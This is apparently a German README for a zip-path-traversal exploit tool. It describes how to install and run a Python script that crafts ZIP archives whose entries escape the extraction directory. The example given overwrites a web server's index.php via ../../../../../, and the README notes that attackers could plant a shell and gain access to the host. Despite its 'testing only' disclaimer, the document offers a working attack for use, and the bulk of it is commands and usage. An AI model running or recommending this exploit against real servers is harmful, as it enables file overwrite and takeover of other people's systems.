Dieser Exploit erstellt ZIP Dateien, die Path Traversing Sicherheitslücken auf Webseiten, Diensten oder Anwendungen ausnutzen. Wichtige Anmerkung: Das Ganze dient nur zu Testzwecken und soll keinesfalls negativ ausgenutzt werden!
Für diesen Exploit wird Python 3 benötigt!
$ sudo pip3 install pyzip
$ git clone https://github.com/DavAlbert/zip-path-traversal-exploit.git
$ cd zip-path-traversal-exploit
$ python3 zip-path-traversal-exploit <datei> <path traversal level>
Usage: python3 zip-path-traversal-exploit.py Beispiel: python3 zip-path-traversal-exploit.py index.php 5 Sobald die ZIP Datei auf einem verwundbaren Web Server extrahiert wird, landet diese im ../../../../../index.php Verzeichnis. Demzufolge wird dann wahrscheinlich die eigentliche index.php überschrieben
Die Gefahr besteht, dass Angreifer auf dem Web-Server eine Shell installieren können und Zugriff auf den Host erlangen können!